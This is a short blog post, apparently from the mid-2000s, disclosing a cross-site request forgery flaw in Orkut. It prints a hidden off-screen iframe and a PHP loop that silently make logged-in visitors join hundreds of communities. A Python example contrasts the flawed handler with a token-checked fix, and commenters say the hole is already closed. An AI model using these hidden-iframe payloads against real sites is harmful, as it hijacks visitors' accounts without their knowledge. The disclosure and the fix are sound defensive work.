Orkut Security Problems
To all the Orkut folks out there who might care:
A simple inline-frame, hidden in the browser by absolute-positioning it with negative values, can trigger the “add as friend” or “join community” command.
<iframe style="width:1px;
height:1px;
position:absolute;
top:-31337px;
left:-31337px"
src="http://www.orkut.com/Community.aspx?cmm=19657&cmd=add">
</iframe>
Another script shows how wrong it was for the Google programmers to let GET requests be active like POST requests (as opposed to staying passive, as is advised for them). If I put the script on my site, my visitors who are still logged in to Orkut might be banned from Orkut because they join 300 communities at once.
PHP (untested) follows:
<?
$i = 100;
while($i < 400)
{
echo "<iframe src=http://www.orkut.com/";
echo "Community.aspx?cmm=$i&cmd=add></iframe>";
$i++;
}
?>
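The server-side view of the problem above, as an added example (not code from this post or from Orkut): a handler that acts on GET, as described, next to one that keeps GET passive and requires POST plus a session-bound token. The handler names, the `csrf` parameter, the HMAC token scheme and the session id are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # assumption: per-deployment secret key


def csrf_token(session_id):
    """Token bound to the session; the site embeds it in its own forms."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def join_on_get(method, params, session_id, memberships):
    """Behaviour the post describes: any request carrying cmd=add joins."""
    if params.get("cmd") == "add":
        memberships.add(params.get("cmm"))
        return 200
    return 200


def join_hardened(method, params, session_id, memberships):
    """GET stays passive; joining needs POST plus the session's token."""
    if params.get("cmd") != "add":
        return 200  # plain page view, no side effect
    if method != "POST":
        return 405  # a framed or linked URL is always a GET
    supplied = params.get("csrf", "").encode()
    if not hmac.compare_digest(supplied, csrf_token(session_id).encode()):
        return 403  # cross-site form post: cookie is sent, token is unknown
    cmm = params.get("cmm", "")
    if not cmm.isdigit():
        return 400
    memberships.add(cmm)
    return 200


def framed_requests(handler, session_id):
    """Replay the GETs a logged-in visitor's browser would send for the
    page's 300 iframes (constructed input) and return the joined set."""
    joined = set()
    for i in range(100, 400):
        handler("GET", {"cmm": str(i), "cmd": "add"}, session_id, joined)
    return joined
```

The token check matters as much as the method check: a hidden auto-submitting form can send a POST with the visitor's cookie, but it cannot read the token out of the site's own pages.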
comments (3)
Orkut? Special spy from Mars or is it called Sedna? Mystifying names I don’t trust.
Orkut sucks and can go fall to pieces.
That is already weeks old and no longer works by now
Damn, and I thought I was on time for once.